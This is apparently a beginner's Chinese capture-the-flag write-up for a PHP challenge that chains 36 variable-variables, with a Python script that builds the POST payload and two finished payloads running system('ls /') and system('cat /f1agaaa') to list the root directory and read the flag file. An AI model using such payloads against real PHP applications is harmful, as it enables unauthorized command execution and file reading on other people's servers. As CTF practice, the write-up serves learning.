萌新入坑,防懒细胞滋生
题目有36个$,给出的最后一个$_可以看做变量0
生成从变量1到变量35,最后赋给变量35的值为真正想执行的命令。
my_str = '_'
for i in range(26):
my_str += '=' + chr(97+i)+'&' + chr(97+i)
for i in range(9):
my_str += '=' + chr(65+i)+'&' + chr(65+i)
my_str += "=system('ls /')"
print(my_str)
我先a-z,在A-I,一共26+9 =35个,我这里最后是给I赋值。
输出:
_=a&a=b&b=c&c=d&d=e&e=f&f=g&g=h&h=i&i=j&j=k&k=l&l=m&m=n&n=o&o=p&p=q&q=r&r=s&s=t&t=u&u=v&v=w&w=x&x=y&y=z&z=A&A=B&B=C&C=D&D=E&E=F&F=G&G=H&H=I&I=system('ls /');
#为什么要_=a开头?不懂
#下载未收费的hackbar
https://github.com/Mr-xn/hackbar2.1.3
load URL、post data打钩、把输出的填空
#g老师救救
#这里ls是查看目录文件的命令
查看目录有一个f1agaaa文件
payload:
_=a&a=b&b=c&c=d&d=e&e=f&f=g&g=h&h=i&i=j&j=k&k=l&l=m&m=n&n=o&o=p&p=q&q=r&r=s&s=t&t=u&u=v&v=w&w=x&x=y&y=z&z=A&A=B&B=C&C=D&D=E&E=F&F=G&G=H&H=I&I=system('cat /f1agaaa');
#这里cat /f1agaaa是打开f1agaaa文件的命令,不懂
hackbar,混过